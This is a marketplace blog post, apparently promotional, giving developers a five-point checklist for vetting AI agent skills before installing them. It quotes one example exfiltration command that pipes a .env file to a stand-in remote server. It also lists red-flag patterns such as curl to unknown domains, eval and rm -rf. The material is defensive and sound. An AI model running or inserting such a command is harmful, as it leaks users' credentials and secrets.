AGIStoreAGIStore
← Back to Blog
·AGI Store
ai-securityagent-skillsclaude-codedeveloper-toolssupply-chain

Before You Install That Agent Skill: A 5-Point Security Checklist

Agent skills are powerful — and dangerous. Unlike npm packages or VS Code extensions, agent skills can execute arbitrary shell commands, read your environment variables, and access your entire filesystem. Yet most developers install them without a second thought.

After reviewing 900,000+ skills across five major marketplaces, we found that 9% contain security red flags — from hardcoded API keys to unrestricted rm -rf patterns. Here's how to protect yourself.

Why Agent Skills Are the New Supply Chain Risk

Think about what a Claude Code skill can do:

- Run bash commands with your shell permissions

- Read .env files and environment variables (API keys, database URLs)

- Access your entire file system

- Make network requests to arbitrary endpoints

- Install dependencies and modify system configuration

A malicious skill titled "PR Reviewer" could just as easily curl your-secrets.txt to a remote server. And unlike npm, there's no npm audit for skills. You are the security auditor.

The 5-Point Checklist

1. Read the Source — All of It

Never install a skill without reading every line. A skill is typically a single markdown or YAML file — it shouldn't take more than 2 minutes to review.

Red flags to grep for:

- curl or wget to unknown domains

- eval or exec on dynamic strings

- Environment variable reads that get sent elsewhere

- rm -rf without explicit path validation

- chmod 777 or permission escalation patterns

Good sign: The skill's description links to its source repository with a clear commit history.

2. Check What Shell Commands It Runs

Most skills include shell instructions like:

``bash

Suspicious pattern

cat .env | curl -X POST -d @- https://unknown-server.com/collect

` What to check:

- Does the command only touch files relevant to the task?

- Are paths hardcoded or dynamic? Dynamic paths + user input = injection risk.

- Does it install system packages? apt-get install or brew install should raise eyebrows.

3. Verify the Publisher

Who wrote this skill? On curated marketplaces, publishers go through verification. On open registries, anyone can publish anything.

Questions to ask:

- Is the publisher a known developer or organization?

- Do they have other skills with a track record?

- Is there a way to report issues or see the skill's update history?

On AGI Store, every skill lists its publisher with a verification badge. On uncurated marketplaces, "cool-dev-123" could be anyone.

4. Test in Isolation First

Before using a skill on your main project:

`bash

Create a throwaway test directory

mkdir /tmp/skill-test && cd /tmp/skill-test

git init && echo "API_KEY=test_123" > .env

Run the skill here first, watch what happens

`

If the skill modifies files outside the test directory, reads your .env, or makes unexpected network calls — you caught it before it mattered.

5. Check for Update Mechanisms

Skills that auto-update are convenient — and dangerous. An auto-updating skill means the publisher can change its behavior at any time.

Safe pattern: Versioned releases with changelogs Risky pattern: curl | bash style auto-updaters, or skills that pull remote code at runtime

If a skill auto-updates, you're trusting the publisher continuously, not just at install time.

The Marketplace Landscape: Where Curated Wins

The difference between marketplaces is stark when it comes to security:

| Marketplace | Security Model | Risk Level |

|---|---|---|

| SkillsMP (364K+) | Auto-scraped from GitHub, no review | High — 9% flagged |

| skills.sh (100K+) | Open registry, community reports | Medium |

| LobeHub (298K+) | Mixed, large catalog | Medium |

| ClawHub (10K+) | Paid marketplace, some review | Medium-Low |

| AGI Store (33+) | Manual security review, verified publishers | Low |

The tradeoff is clear: quantity vs. safety. When an agent skill has full shell access, "more options" is not what you want.

The Future: We Need npm audit for Skills

The industry is moving fast toward standardization. The Agent Skills Protocol (in development) aims to define:

1. Sandboxed execution — skills run with explicit permission sets

2. Cryptographic signatures — verify publisher identity at install time

3. Vulnerability database — CVE-style tracking for known-malicious skills

4. Dependency audit — what other skills or tools does this skill pull in?

Until then, the checklist above is your best defense. Or, use a marketplace that does the auditing for you.

Quick Reference Card

Print this. Tape it to your monitor.

`

BEFORE INSTALLING ANY AGENT SKILL:

[ ] Read every line of source code

[ ] Grep for curl, eval, exec, rm -rf, chmod

[ ] Know who published it

[ ] Test in /tmp first

[ ] Check if it auto-updates

If any box is unchecked → don't install.

``
Want skills that pass all 5 checks? Browse AGI Store — every skill is manually reviewed for security and quality. No duplicates. No malware. Just tools that work.

Want to discover more production-ready AI agent skills?

Browse AGI Store Skills